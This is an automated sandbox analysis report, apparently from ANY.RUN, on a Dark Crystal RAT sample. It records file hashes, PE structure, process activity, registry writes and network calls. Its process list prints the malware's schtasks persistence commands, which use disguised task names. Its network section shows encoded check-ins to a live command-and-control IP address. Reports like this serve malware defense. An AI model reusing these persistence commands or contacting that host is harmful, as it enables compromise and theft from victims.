File name: | ©.scr |
Full analysis: | https://app.any.run/tasks/584251d2-3f2f-49d1-99ba-b6ebd05d4df1 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | May 21, 2022, 11:12:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5: | 141263663E5FCAEC2875AC2D6A190F7E |
SHA1: | D1001D757FC95CDEF339BF1E9311D934C7BC7A7C |
SHA256: | 1343E32C154A304C9733585CD4D67912EBCC13E50F1CA761C65E626F790179B6 |
SSDEEP: | 24576:P2G/nvxW3W7WJ6S0kc4I62wSmw1uK91MC5D5mR1FSGxui9jXM2QHcaM:PbA3r6zR4I6BMT66iReU |
.exe | | | Win32 Executable (generic) (52.9) |
---|---|---|
.exe | | | Generic Win/DOS Executable (23.5) |
.exe | | | DOS Executable Generic (23.5) |
Subsystem: | Windows GUI |
---|---|
SubsystemVersion: | 5.1 |
ImageVersion: | - |
OSVersion: | 5.1 |
EntryPoint: | 0x1ec40 |
UninitializedDataSize: | - |
InitializedDataSize: | 143360 |
CodeSize: | 201216 |
LinkerVersion: | 14 |
PEType: | PE32 |
TimeStamp: | 2020:12:01 19:00:55+01:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 01-Dec-2020 18:00:55 |
Detected languages: |
|
Debug artifacts: |
|
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000118 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 6 |
Time date stamp: | 01-Dec-2020 18:00:55 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x000310EA | 0x00031200 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.70808 |
.rdata | 0x00033000 | 0x0000A612 | 0x0000A800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.22174 |
.data | 0x0003E000 | 0x00023728 | 0x00001000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.70882 |
.didat | 0x00062000 | 0x00000188 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.29825 |
.rsrc | 0x00063000 | 0x00015168 | 0x00015200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.67308 |
.reloc | 0x00079000 | 0x00002268 | 0x00002400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.55486 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.26192 | 1875 | Latin 1 / Western European | English - United States | RT_MANIFEST |
7 | 3.1586 | 482 | Latin 1 / Western European | English - United States | RT_STRING |
8 | 3.11685 | 460 | Latin 1 / Western European | English - United States | RT_STRING |
9 | 3.11236 | 440 | Latin 1 / Western European | English - United States | RT_STRING |
10 | 2.99727 | 326 | Latin 1 / Western European | English - United States | RT_STRING |
11 | 3.2036 | 1094 | Latin 1 / Western European | English - United States | RT_STRING |
12 | 3.12889 | 358 | Latin 1 / Western European | English - United States | RT_STRING |
13 | 3.01704 | 338 | Latin 1 / Western European | English - United States | RT_STRING |
14 | 2.94627 | 266 | Latin 1 / Western European | English - United States | RT_STRING |
15 | 2.83619 | 188 | Latin 1 / Western European | English - United States | RT_STRING |
KERNEL32.dll |
USER32.dll (delay-loaded) |
gdiplus.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2876 | "C:\Users\admin\AppData\Local\Temp\ ©.scr.exe" | C:\Users\admin\AppData\Local\Temp\ ©.scr.exe | — | Explorer.EXE | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221226540 Modules
| |||||||||||||||
3548 | "C:\Users\admin\AppData\Local\Temp\ ©.scr.exe" | C:\Users\admin\AppData\Local\Temp\ ©.scr.exe | Explorer.EXE | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
1820 | "C:\Windows\System32\WScript.exe" "C:\agentmonitorNet\we8WzpRKqSagh80pvHC.vbe" | C:\Windows\System32\WScript.exe | — | ©.scr.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
1980 | C:\Windows\system32\cmd.exe /c ""C:\agentmonitorNet\8Y8Ym276q9Dc2L.bat" " | C:\Windows\system32\cmd.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
116 | "C:\agentmonitorNet\componentCommonsvc.exe" | C:\agentmonitorNet\componentCommonsvc.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
3516 | schtasks.exe /create /tn "IMEDICTUPDATEI" /sc MINUTE /mo 8 /tr "'C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\IMEDICTUPDATE.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3572 | schtasks.exe /create /tn "IMEDICTUPDATE" /sc ONLOGON /tr "'C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\IMEDICTUPDATE.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
996 | schtasks.exe /create /tn "IMEDICTUPDATEI" /sc MINUTE /mo 13 /tr "'C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\IMEDICTUPDATE.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1856 | schtasks.exe /create /tn "SearchIndexerS" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\SearchIndexer.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3840 | schtasks.exe /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\MSOCache\All Users\SearchIndexer.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (3548) ©.scr.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3548) ©.scr.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3548) ©.scr.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3548) ©.scr.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (1820) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (1820) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (1820) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (1820) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (116) componentCommonsvc.exe | Key: | HKEY_CURRENT_USER\Software\019ad28cc50225c7034d0632f200efdf05ba8c3c |
Operation: | write | Name: | 5e504606725a76a282d262131ee02c5617f404d2 |
Value: WyJDOlxcYWdlbnRtb25pdG9yTmV0XFxjb21wb25lbnRDb21tb25zdmMuZXhlIiwiQzpcXFJlY292ZXJ5XFwzNDViNDZmZS1hOWY5LTExZTctYTgzYy1lOGE0ZjcyYjFkMzNcXElNRURJQ1RVUERBVEUuZXhlIiwiQzpcXE1TT0NhY2hlXFxBbGwgVXNlcnNcXFNlYXJjaEluZGV4ZXIuZXhlIiwiQzpcXFVzZXJzXFxBZG1pbmlzdHJhdG9yXFxDb29raWVzXFx0YXNrZW5nLmV4ZSIsIkM6XFxVc2Vyc1xcQWxsIFVzZXJzXFxNaWNyb3NvZnQgSGVscFxcSU1FRElDVFVQREFURS5leGUiLCJDOlxcYWdlbnRtb25pdG9yTmV0XFxsc20uZXhlIiwiQzpcXGFnZW50bW9uaXRvck5ldFxcY3RmbW9uLmV4ZSIsIkM6XFxQcm9ncmFtIEZpbGVzXFxNaWNyb3NvZnQgT2ZmaWNlXFxzbXNzLmV4ZSIsIkM6XFxSZWNvdmVyeVxcMzQ1YjQ2ZmUtYTlmOS0xMWU3LWE4M2MtZThhNGY3MmIxZDMzXFxjb25ob3N0LmV4ZSIsIkM6XFxXaW5kb3dzXFxMb2dzXFxDQlNcXHNtc3MuZXhlIl0= | |||
(PID) Process: | (116) componentCommonsvc.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3548 | ©.scr.exe | C:\agentmonitorNet\we8WzpRKqSagh80pvHC.vbe | vbe | |
MD5:13A2309AF4284B0E1A3B7D44741C981F | SHA256:A058199089403027B8FD46FE7ABEB2DBEBBD61C69F97548E194A087D88599F2D | |||
116 | componentCommonsvc.exe | C:\agentmonitorNet\26c12092da979c | text | |
MD5:349BA698D1FFD4341FD7FE4DEB996421 | SHA256:BA87E1C5DCBAA91814984C359DA64459E5FFC7591499A730BDF7BAC57EB7F5BF | |||
116 | componentCommonsvc.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\088424020bedd6 | text | |
MD5:8DF4E1F5DDAFD3288A79139E3ACDCF76 | SHA256:0C563FA3FDCA87F2FCCA36C5D6638F404D0F5468FE56726FB1BAA29EC9FEAFB8 | |||
116 | componentCommonsvc.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\1173b9a28a9c10 | text | |
MD5:3639F8AED4AC5E8B8E8A86B761FB2BFF | SHA256:D24D6200DB7794E4D76C1C00C7D2DF2FDA0D843026775DD7CB6249D1D762AAF8 | |||
116 | componentCommonsvc.exe | C:\MSOCache\All Users\4a1145983886ca | text | |
MD5:1233A4586428175107DA098DCEA5691C | SHA256:87FB064362CF2BF3D110F5129DAE77BE99CC6E7EC2FC174D48BBAE8F3154837E | |||
116 | componentCommonsvc.exe | C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\96094160f8fe35 | text | |
MD5:89A09B1DC1A506725545028D9DB0E4AC | SHA256:76841C6B2581AA94A14C492EAFC8CBF5B15E671FFAA828EF045DAAD53EEBB4B6 | |||
116 | componentCommonsvc.exe | C:\agentmonitorNet\101b941d020240 | text | |
MD5:ACD4E6C207494EB928C96E42ECABF3BC | SHA256:C8CAF8620C0FB86256E47D638A512AC28B2B424F0705EB4C871C76D1C874CD95 | |||
116 | componentCommonsvc.exe | C:\ProgramData\Microsoft Help\1173b9a28a9c10 | text | |
MD5:93E885E485821F75967882BB1A7CE1F6 | SHA256:CC6527D873679FDF81D5750E2C06AF4FA8DD30D77CBF185A0558C6B1D49573B4 | |||
116 | componentCommonsvc.exe | C:\Program Files\Microsoft Office\69ddcba757bf72 | text | |
MD5:BBA7D419C5AB36604BCB8A78A5C3CB27 | SHA256:2C5B6CC68A46B421547A42E624C4F7D9B77D2F2FAA7C69909CB0EB84347A6281 | |||
3548 | ©.scr.exe | C:\agentmonitorNet\8Y8Ym276q9Dc2L.bat | text | |
MD5:7DD2DF583C729B5F3456C7821E7A2507 | SHA256:28FA1E82EED4A6816E8C22FED7960AAF8499F63AEC316E284372D05E1F42501F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3140 | conhost.exe | GET | — | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&f8f468f6b5e3d07b4b439ed6bd7354cb=d1nIkJDMzkjY1EDZ3YjZ1YWZ1MDM2IWMzEjN0IjMjNmZhVDNlZDZ5EWN5IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | — | — | malicious |
3140 | conhost.exe | GET | — | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&f8f468f6b5e3d07b4b439ed6bd7354cb=d1nIxYTMmNmZzMzYwgDM1ATNxQGN0ITZlBjYiZWN5cDNiFWMmFzMmFDZ4IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | — | — | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?zgE5oxkNwR1wZVKWadGLSzvjw4=Iye6c9M9FzJCMOuNQckhW&cl3Icg9ufJtJbZRVZwN=FgQa46hmfGLW&ff33772bece92c06819dfa51fb6fca58=9dc8cec482ad0776090c89cbfeb891e9&9d297edcb1b15d681ee257979b496eae=QMjZTYmRzMyEjYxgzNkdTZ3gjZjlTNiV2YlZmMmdjNxUDNzEWMhljY&zgE5oxkNwR1wZVKWadGLSzvjw4=Iye6c9M9FzJCMOuNQckhW&cl3Icg9ufJtJbZRVZwN=FgQa46hmfGLW | RU | text | 2.09 Kb | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&8851c6d4460ca6de87f4d19182d5eacf=0VfiIiOiEmZzMGOyUWN0AzNjRDMzIDM1UmMiFmNzQjNhJTNxkTYiwiIkJDMzkjY1EDZ3YjZ1YWZ1MDM2IWMzEjN0IjMjNmZhVDNlZDZ5EWN5IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | text | 104 b | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&5b30b517a3f8a753c628155092037b5f=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 | RU | text | 104 b | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&5b30b517a3f8a753c628155092037b5f=QX9JCNr9EMWdkYzZkMWdGOHR2ds52YEJUejhGarNkT0s2TwY1RiNnRyY1ZnJzYo5UbXtEMnRlNRhlWzh3VZhlQ5JWeW1mY2FzaD5ENr9EMWdkYzZkMWdWVtNmdOtmYwljMZxmUYFWTwFFRPBHRkxGeHJGakZUS6ZFSaZHaYJ1SwcGV2EFWaNHeXlFWCNlYxYVbjxGaHRmRwFFRPBHRkxGeHJGakZUS0ZlbjBjTXp1cWt2QORzaPBjVHJ2cGJjVnVVbjZnTFFmeGdkULBzZUZTUYp1c4dVWYJUaiBXOykFbShVZDBXUE9EcERGb4dkYoRmRJxmSzIGR1cVY250RkBnSrNkT0s2TwY1RiNnRyY1ZNdVY0lzRkJEcRR0TwREZsh3RihGZGlUNKNjY0pEWRtEMnRlNRhlWzh3VZhlQTpla1cVW1xWbRJiOiEmZzMGOyUWN0AzNjRDMzIDM1UmMiFmNzQjNhJTNxkTYiwiI3ImZkJ2YkNTO1MmZ3kjZ4YTNyATOkZGMzMDM0Q2Y5Q2YkJWMldjNyIiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | text | 104 b | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&f8f468f6b5e3d07b4b439ed6bd7354cb=d1nIhJWMiZDMjNzY4cTMllDNilTNwMmZhdDNwIGZ5czN4IjZ0YDNyI2Y0IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W&8851c6d4460ca6de87f4d19182d5eacf=0VfiIiOiEmZzMGOyUWN0AzNjRDMzIDM1UmMiFmNzQjNhJTNxkTYiwiIhJWMiZDMjNzY4cTMllDNilTNwMmZhdDNwIGZ5czN4IjZ0YDNyI2Y0IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZisHL9JSUmljS5BVavpWSwkkMOxmSykFbGpXWx0kaOd3YEpVNFpXWphmaatmUq5UbORVT6VVbNFTR65kMFR0TthmeORTSDxUa4oWS2k0QNRTUX50aSdUT4FkaNFzZU9EbOdVWrRmaadXVH9EbGdVTo5keOpXWE9UbaRkT1UERaNTQU1Uaz52TpV0RkhmUFRGNW1WSzVlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2a510Zj1mYwJESjxmUzU1ZRR1Tnd3VatWOXR1ZZRUS1g3VhRnRtJ1ZRpmT0g2QJZDawI1djpGT5F0QRdWVGVFRCNUT3FlaORXVUF2ZrNFVVh2UalXOyE1ZrlWVvd3VaBTNXNVavpWSsFzVZ9kVGVFRKNETpt2URZHNFt0ZJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWS4lUaPl2YVFVVKNETpFFWhNkQp1keBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWa0IjYrVjMi1UOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUawIjYrRWbiBHdFl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETp1EVPdHND1Ed3NkTyUEVOVXRU5UavpWSqlzRil2dpl0QktWS2k0UllnUuJWM5ITWpdXaJtWNXl1ck1mYGpUaPlGNyIGckdlW5p0QMlGNyI2a1IjYNpUaPl2aIRGcO1WSzl0QNRTRqxUMNRVT1lEVNlHND9ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYo